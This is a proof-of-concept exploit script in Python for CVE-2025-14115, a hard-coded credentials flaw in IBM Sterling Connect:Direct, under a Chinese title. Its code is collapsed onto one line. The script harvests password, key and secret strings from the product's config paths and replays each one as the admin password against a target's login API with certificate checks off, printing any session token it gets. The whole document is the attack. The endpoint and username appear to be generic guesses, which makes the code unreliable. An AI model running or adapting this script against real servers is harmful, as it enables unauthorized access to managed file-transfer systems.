CVE-2025-14115: IBM Sterling Connect:Direct UNIX容器硬编码凭证漏洞

# CVE-2025-14115 PoC - IBM Sterling Connect:Direct Hard-coded Credentials # This PoC demonstrates searching for hard-coded credentials in the affected product import requests import re import os import subprocess TARGET_HOST = "target_server" TARGET_PORT = 8443 def search_hardcoded_credentials(): """Search for hard-coded credentials in IBM Sterling Connect:Direct""" # Common hardcoded credential patterns to search credential_patterns = [ r"password\s*=\s*['\"][^'\"]+['\"]", r"PASSWORD\s*=\s*['\"][^'\"]+['\"]", r"passwd\s*=\s*['\"][^'\"]+['\"]", r"key\s*=\s*['\"][^'\"]+['\"]", r"secret\s*=\s*['\"][^'\"]+['\"]", r"encrypt\s*=\s*['\"][^'\"]+['\"]", ] # Search in common locations search_paths = [ "/opt/ibm/cdirect/", "/opt/IBM/ConnectDirect/", "/etc/cdirect/", "./config/", ] found_credentials = [] for path in search_paths: if os.path.exists(path): for root, dirs, files in os.walk(path): for file in files: if file.endswith(('.conf', '.cfg', '.xml', '.properties', '.py', '.sh', '.jar')): filepath = os.path.join(root, file) try: with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() for pattern in credential_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches: found_credentials.append({ 'file': filepath, 'matches': matches }) except Exception as e: continue return found_credentials def exploit_hardcoded_credential(credential): """Attempt to exploit hard-coded credential for authentication bypass""" # Try to authenticate using hardcoded credentials auth_payload = { 'username': 'admin', 'password': credential } try: response = requests.post( f'https://{TARGET_HOST}:{TARGET_PORT}/api/login', json=auth_payload, verify=False, timeout=10 ) if response.status_code == 200: token = response.json().get('token') print(f"[!] Successfully authenticated with hardcoded credential!") print(f"[*] Token: {token}") return token except Exception as e: print(f"[*] Authentication attempt failed: {e}") return None def main(): print("[*] CVE-2025-14115 - IBM Sterling Connect:Direct Hard-coded Credentials PoC") print("[*] Searching for hardcoded credentials...") credentials = search_hardcoded_credentials() if credentials: print(f"[!] Found {len(credentials)} potential hardcoded credentials") for cred in credentials: print(f"\n[File] {cred['file']}") for match in cred['matches']: print(f" - {match}") exploit_hardcoded_credential(match.split('=')[1].strip('\"\' ')) else: print("[*] No hardcoded credentials found in standard locations") print("[*] Try manual inspection of configuration files and binaries") if __name__ == "__main__": main()